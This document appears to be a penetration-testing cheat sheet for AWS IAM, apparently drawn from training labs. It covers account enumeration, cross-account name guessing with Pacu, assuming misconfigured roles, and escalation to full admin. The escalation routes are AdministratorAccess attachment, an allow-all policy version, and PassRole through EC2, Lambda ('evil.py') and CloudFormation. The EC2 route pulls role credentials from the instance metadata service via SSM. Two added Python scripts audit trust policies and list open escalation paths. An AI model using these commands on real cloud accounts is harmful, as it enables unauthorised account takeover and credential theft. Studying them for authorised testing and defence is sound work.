
IAM

Description

With AWS Identity and Access Management (IAM), you can specify who or what can access services and resources in AWS, centrally manage fine-grained permissions, and analyze access to refine permissions across AWS.

Usage

Export the obtained credentials (the session token is only needed for temporary credentials, e.g. from sts:AssumeRole or an instance profile) :

export AWS_ACCESS_KEY_ID=$ACCESS_KEY_ID
export AWS_SECRET_ACCESS_KEY=$SECRET_ACCESS_KEY
export AWS_SESSION_TOKEN=$SESSION_TOKEN

First checks, whatever the scenario :

aws iam list-user-policies --user-name ad-admisson
aws iam get-user-policy --user-name ad-admisson --policy-name $POLICY_NAME
aws iam list-roles

Enumeration :

aws configure
aws iam get-user
aws iam list-users
aws iam list-roles
aws iam list-groups-for-user --user-name ad-admisson
aws iam list-user-policies --user-name ad-admisson
aws iam list-policies
aws iam list-attached-user-policies --user-name ad-admisson
aws iam get-user-policy --user-name ad-admisson --policy-name $POLICY_NAME
aws iam list-role-policies --role-name $ROLE_NAME
aws iam get-role-policy --role-name $ROLE_NAME --policy-name $POLICY_NAME
aws iam list-signing-certificates --user-name ad-admisson
aws iam list-ssh-public-keys --user-name ad-admisson
aws iam get-ssh-public-key --user-name ad-admisson --encoding PEM --ssh-public-key-id $ID
aws iam list-mfa-devices
aws iam list-virtual-mfa-devices
aws iam get-login-profile --user-name ad-admisson
aws iam list-groups
aws iam list-group-policies --group-name ad-admisson
aws iam list-attached-group-policies --group-name ad-admisson
aws iam list-instance-profiles

Cross Account Enumeration :

Pacu's iam__enum_roles and iam__enum_users modules confirm role and user names in a foreign account without any credentials for it : they repeatedly update the trust policy of a role we control ($ROLE_NAME, in our own account) to name candidate principals in $ACCOUNT_ID, and IAM only accepts principals that exist. The trust policy of $ROLE_NAME is modified during the run.

python3 pacu.py
* New session (0)
set_keys
list
run iam__enum_roles --role-name $ROLE_NAME --account-id $ACCOUNT_ID --word-list /root/names.txt
run iam__enum_users --role-name $ROLE_NAME --account-id $ACCOUNT_ID --word-list /root/names.txt

Misconfigured Trust Policy :

If a role's trust policy allows any principal ("Principal": {"AWS": "*"}) or a whole foreign account without a Condition, any AWS identity, including one in an attacker-controlled account, can assume it and receive temporary credentials in the target account without holding any access there. The trust policy is the AssumeRolePolicyDocument shown by list-roles / get-role; the identity policy below shows what the current user is allowed to assume.

aws iam get-user-policy --user-name ad-admisson --policy-name $POLICY_NAME
aws sts assume-role --role-arn arn:aws:iam::$AWS_ACCOUNT_ID:role/$ROLE_NAME --role-session-name $ROLE_NAME
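To triage trust policies at scale rather than reading them one by one, the script below takes the Roles array of `aws iam list-roles` and flags roles that any AWS principal, or a foreign account without a Condition, can assume. It is an added example, not code from the original page; OWN_ACCOUNT and the sample roles are constructed.

```python
"""Flag role trust policies that outsiders can use to assume the role.

Added example, not code from the original page: feed it the role objects that
`aws iam list-roles` returns (each carries an AssumeRolePolicyDocument) and it
reports roles open to any AWS principal, or to a foreign account with no
Condition such as sts:ExternalId. OWN_ACCOUNT and SAMPLE_ROLES are constructed.
"""
import json

OWN_ACCOUNT = "111111111111"  # assumption: the account under assessment


def _aslist(v):
    """IAM accepts a scalar wherever a list is allowed; normalise to a list."""
    if v is None:
        return []
    return v if isinstance(v, list) else [v]


def _principal_entries(principal):
    """Yield (kind, value) pairs; Principal is "*" or {AWS|Service|Federated: ...}."""
    if principal == "*":
        yield "AWS", "*"
        return
    for kind, vals in (principal or {}).items():
        for v in _aslist(vals):
            yield kind, v


def _account_of(principal):
    """Account id from an AWS principal (bare 12-digit id or ARN), else None."""
    if principal.isdigit() and len(principal) == 12:
        return principal
    parts = principal.split(":")
    return parts[4] if len(parts) >= 5 and parts[4] else None


def audit_trust_policy(role_name, doc, own_account=OWN_ACCOUNT):
    """Return (role, severity, message) findings for one trust policy."""
    findings = []
    for stmt in _aslist(doc.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        actions = {a.lower() for a in _aslist(stmt.get("Action"))}
        if not actions & {"sts:assumerole", "sts:*", "*"}:
            continue  # e.g. AssumeRoleWithWebIdentity only; out of scope here
        gated = bool(stmt.get("Condition"))
        for kind, value in _principal_entries(stmt.get("Principal")):
            if kind != "AWS":
                continue  # Service / Federated principals are normal for service roles
            if value == "*":
                findings.append((role_name, "CRITICAL",
                                 "any AWS principal may assume this role"
                                 + (" (only a Condition limits it)" if gated else "")))
                continue
            acct = _account_of(value)
            if acct and acct != own_account:
                if gated:
                    findings.append((role_name, "INFO",
                                     f"cross-account trust to {acct}, limited by a Condition"))
                else:
                    findings.append((role_name, "HIGH",
                                     f"account {acct} may assume this role with no Condition"))
    return findings


def audit_roles(roles, own_account=OWN_ACCOUNT):
    """roles: list of dicts shaped like the Roles array of `aws iam list-roles`."""
    out = []
    for r in roles:
        doc = r["AssumeRolePolicyDocument"]
        if isinstance(doc, str):  # tolerate the document arriving as a JSON string
            doc = json.loads(doc)
        out.extend(audit_trust_policy(r["RoleName"], doc, own_account))
    return out


def _role(name, statement):
    return {"RoleName": name, "AssumeRolePolicyDocument":
            {"Version": "2012-10-17", "Statement": [statement]}}


# Constructed sample roles, not real resources
SAMPLE_ROLES = [
    _role("open-role", {"Effect": "Allow", "Principal": {"AWS": "*"},
                        "Action": "sts:AssumeRole"}),
    _role("partner-role", {"Effect": "Allow", "Action": "sts:AssumeRole",
                           "Principal": {"AWS": "arn:aws:iam::222222222222:root"}}),
    _role("partner-role-extid", {"Effect": "Allow", "Action": "sts:AssumeRole",
                                 "Principal": {"AWS": "arn:aws:iam::222222222222:root"},
                                 "Condition": {"StringEquals": {"sts:ExternalId": "abc123"}}}),
    _role("ec2-service-role", {"Effect": "Allow", "Action": "sts:AssumeRole",
                               "Principal": {"Service": "ec2.amazonaws.com"}}),
]

if __name__ == "__main__":
    for role, severity, message in audit_roles(SAMPLE_ROLES):
        print(f"[{severity}] {role}: {message}")
```

Pipe real data in with `aws iam list-roles --output json` and `json.load(...)["Roles"]`; a CRITICAL or HIGH finding is a candidate for the assume-role command above, run from any account.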

Overly Permissive Permissions :

With iam:AttachUserPolicy on a user we control, attach the AWS managed AdministratorAccess policy (arn:aws:iam::aws:policy/AdministratorAccess); with iam:CreateLoginProfile as well, give the user a console password.

aws iam list-policies | grep "AdministratorAccess"
aws iam attach-user-policy --user-name $USERNAME --policy-arn $POLICY_ARN
aws iam create-login-profile --user-name $USERNAME --password $PASSWORD --no-password-reset-required

Dangerous Policy Combination :

Permissions that are harmless on their own chain when split across two identities : one holds iam:AddUserToGroup, the other holds iam:CreatePolicyVersion on a customer managed policy attached to that group. Add our user to the group with the first set of credentials, switch to the second, and publish a new default version of the policy that allows everything; the new version applies immediately to every principal the policy is attached to. A managed policy holds at most five versions, so an old one may have to be deleted first (iam:DeletePolicyVersion).

aws sts get-caller-identity
* export the first identity's credentials
aws iam add-user-to-group --group-name $GROUP_NAME --user-name $USERNAME
* unset them and export the second identity's credentials
aws iam create-policy-version --policy-arn $POLICY_ARN --policy-document file://file.json --set-as-default

file.json

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}

Pass Role : EC2

With iam:PassRole on a privileged role and ec2:RunInstances, launch an instance under that role's instance profile and read the role's credentials from the instance metadata service. The role's trust policy must allow ec2.amazonaws.com, and the instance profile must already exist (creating one takes iam:CreateInstanceProfile and iam:AddRoleToInstanceProfile).

Find the AMI id for Amazon Linux 2 (the amzn-ami-hvm-* pattern matches the older Amazon Linux 1; pick the most recent CreationDate) :

aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn2-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --output json

Check the subnets available in the AWS account :

aws ec2 describe-subnets

Check security groups for ec2 service :

aws ec2 describe-security-groups

Start an ec2 instance using collected details (Name= takes the instance profile name; the credentials path on the metadata service uses the role name, which may differ) :

aws ec2 run-instances --subnet-id subnet-0b57901260df6b3f3 --image-id ami-0d08a21fc010da680 --iam-instance-profile Name=ec2_admin --instance-type t2.micro --security-group-ids "sg-06407fe95d211b245"

Run commands on the remote ec2 instance using SSM. This requires the passed role to carry SSM permissions (e.g. the AmazonSSMManagedInstanceCore managed policy), an AMI with the SSM agent (Amazon Linux 2 ships it) and network reachability to the SSM endpoints. If the instance enforces IMDSv2, the curl must first obtain a token from /latest/api/token :

aws ssm send-command \
    --document-name "AWS-RunShellScript" \
    --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2admin/"]' \
    --targets "Key=instanceids,Values=i-0aa5cdcaf86dec148" \
    --comment "aws cli 1"

Get the command's output using SSM (the command id is the CommandId field of the send-command response) :

aws ssm get-command-invocation \
    --command-id "0765bff4-4966-446f-a0a2-4e0cdfee565f" \
    --instance-id "i-0da83d9b4322af3fa"

Pass Role : Lambda

With iam:PassRole on a role that trusts lambda.amazonaws.com and has IAM write permissions, plus lambda:CreateFunction and lambda:InvokeFunction, deploy a function that uses the role's credentials to attach AdministratorAccess to our own user. Use a runtime that still accepts new functions (python3.8 is deprecated and can no longer be used to create functions).

evil.py

import boto3


def handler(event, context):
    # Runs with the passed role's credentials, not with ours
    iam = boto3.client("iam")
    response = iam.attach_user_policy(
        UserName="student",
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess",
    )
    return response

zip evil-function.zip evil.py
aws lambda create-function \
    --function-name evil-function \
    --runtime python3.12 \
    --zip-file fileb://evil-function.zip \
    --handler evil.handler \
    --role arn:aws:iam::645723898191:role/lab11lambdaiam

aws lambda invoke --function-name evil-function invoke_out.txt

Pass Role : CloudFormation

With iam:PassRole on a role that trusts cloudformation.amazonaws.com and cloudformation:CreateStack, deploy a stack whose template attaches an inline admin policy to our user; CloudFormation makes the IAM calls with the passed role, so our own identity needs no IAM write permissions. CAPABILITY_NAMED_IAM is required because the template creates a named IAM resource.

new_policy.json

{
  "Resources": {
    "EvilTemplate": {
      "Type": "AWS::IAM::Policy",
      "Properties": {
        "PolicyName": "admin_policy",
        "PolicyDocument": {
          "Version": "2012-10-17",
          "Statement": [
            {
              "Effect": "Allow",
              "Action": "*",
              "Resource": "*"
            }
          ]
        },
        "Users": [
          "student"
        ]
      }
    }
  }
}

aws cloudformation create-stack --stack-name ad-stack --template-body file://new_policy.json --capabilities CAPABILITY_NAMED_IAM --role-arn arn:aws:iam::161176965264:role/lab12CFDeployRole
aws cloudformation describe-stacks --stack-name ad-stack
aws cloudformation describe-stack-events --stack-name ad-stack
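The escalation primitives in the Overly Permissive Permissions, Dangerous Policy Combination and the three Pass Role sections all hinge on what the caller's identity policies allow and, for PassRole, on which service principal the target role trusts. The script below is an added example, not code from the original page : given the policy documents attached to the current principal (as returned by get-user-policy / get-policy-version) and the Roles array of list-roles, it evaluates each action with IAM wildcard matching and explicit-Deny precedence and lists the escalation paths that are actually open, including which role can be passed to which service. Conditions are ignored, so it can over-report; ACCOUNT, TARGET_USER, the policies and the roles are constructed.

```python
"""List the privilege-escalation paths from this page that a principal holds.

Added example, not code from the original page. Input: identity policy documents
(from `aws iam get-user-policy` / `get-policy-version`) and roles (from
`aws iam list-roles`). Conditions are not evaluated, so results may over-report.
ACCOUNT, TARGET_USER, SAMPLE_POLICIES and SAMPLE_ROLES are constructed.
"""
import fnmatch

ACCOUNT = "111111111111"  # assumption: account under assessment
TARGET_USER = f"arn:aws:iam::{ACCOUNT}:user/student"

# service principal the role must trust -> (label, actions the caller also needs)
SERVICE_CHAINS = {
    "ec2.amazonaws.com": ("PassRole -> EC2 (ec2:RunInstances)", ["ec2:RunInstances"]),
    "lambda.amazonaws.com": ("PassRole -> Lambda (CreateFunction + InvokeFunction)",
                             ["lambda:CreateFunction", "lambda:InvokeFunction"]),
    "cloudformation.amazonaws.com": ("PassRole -> CloudFormation (CreateStack)",
                                     ["cloudformation:CreateStack"]),
}


def _aslist(v):
    if v is None:
        return []
    return v if isinstance(v, list) else [v]


def _match(pattern, value):
    """IAM wildcard match ('*' and '?'); action names are case-insensitive."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def _stmt_matches(stmt, action, resource):
    """Does the statement cover action on resource? resource='*' means 'any at all'."""
    if "Action" in stmt:
        act = any(_match(p, action) for p in _aslist(stmt["Action"]))
    else:  # NotAction: covered when the action is NOT in the excluded set
        act = not any(_match(p, action) for p in _aslist(stmt.get("NotAction")))
    if resource == "*":
        res = True
    elif "Resource" in stmt:
        res = any(_match(p, resource) for p in _aslist(stmt["Resource"]))
    else:
        res = not any(_match(p, resource) for p in _aslist(stmt.get("NotResource")))
    return act and res


def allowed(policies, action, resource="*"):
    """Evaluate action on resource across all policies; an explicit Deny wins."""
    verdict = False
    for doc in policies:
        for stmt in _aslist(doc.get("Statement")):
            if not _stmt_matches(stmt, action, resource):
                continue
            if stmt.get("Effect") == "Deny":
                return False
            if stmt.get("Effect") == "Allow":
                verdict = True
    return verdict


def _trusted_services(trust_doc):
    svcs = set()
    for stmt in _aslist(trust_doc.get("Statement")):
        princ = stmt.get("Principal")
        if stmt.get("Effect") == "Allow" and isinstance(princ, dict):
            svcs.update(_aslist(princ.get("Service")))
    return svcs


def find_escalations(policies, roles, target_user, attached_policy_arns=(), group_arn=None):
    """Return the sorted list of escalation paths open to the principal."""
    paths = []
    if allowed(policies, "iam:AttachUserPolicy", target_user):
        paths.append("iam:AttachUserPolicy on target user (attach AdministratorAccess)")
    if allowed(policies, "iam:CreateLoginProfile", target_user):
        paths.append("iam:CreateLoginProfile on target user (set a console password)")
    if group_arn and allowed(policies, "iam:AddUserToGroup", group_arn):
        paths.append(f"iam:AddUserToGroup into {group_arn}")
    for arn in attached_policy_arns:
        if allowed(policies, "iam:CreatePolicyVersion", arn):
            paths.append(f"iam:CreatePolicyVersion on {arn} (new default version: Allow *)")
    for role in roles:  # PassRole needs the role ARN allowed AND the service trusted
        if not allowed(policies, "iam:PassRole", role["Arn"]):
            continue
        for svc in _trusted_services(role["AssumeRolePolicyDocument"]) & set(SERVICE_CHAINS):
            label, needed = SERVICE_CHAINS[svc]
            if all(allowed(policies, a) for a in needed):
                paths.append(f"{label} via {role['RoleName']}")
    return sorted(paths)


# Constructed sample input: the current user's policies and the account's roles
SAMPLE_POLICIES = [{"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["iam:PassRole", "iam:Get*", "iam:List*"], "Resource": "*"},
    {"Effect": "Allow", "Action": "lambda:*", "Resource": "*"},
    {"Effect": "Allow", "Action": "ec2:Describe*", "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:CreatePolicyVersion",
     "Resource": f"arn:aws:iam::{ACCOUNT}:policy/dev-policy"},
    {"Effect": "Deny", "Action": "iam:AttachUserPolicy", "Resource": "*"},
]}]
ATTACHED = [f"arn:aws:iam::{ACCOUNT}:policy/dev-policy"]


def _role(name, service):
    return {"RoleName": name, "Arn": f"arn:aws:iam::{ACCOUNT}:role/{name}",
            "AssumeRolePolicyDocument": {"Version": "2012-10-17", "Statement": [
                {"Effect": "Allow", "Principal": {"Service": service}, "Action": "sts:AssumeRole"}]}}


SAMPLE_ROLES = [_role("lambda-admin", "lambda.amazonaws.com"), _role("ec2-admin", "ec2.amazonaws.com")]

if __name__ == "__main__":
    for path in find_escalations(SAMPLE_POLICIES, SAMPLE_ROLES, TARGET_USER, ATTACHED):
        print(path)
```

On the constructed input the user can pass lambda-admin to Lambda but not ec2-admin to EC2 (no ec2:RunInstances), and can rewrite dev-policy but not attach policies directly (explicit Deny). For a real engagement, collect the documents with the Enumeration commands above and pass the inline and attached policy documents together, since IAM evaluates them as one set.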
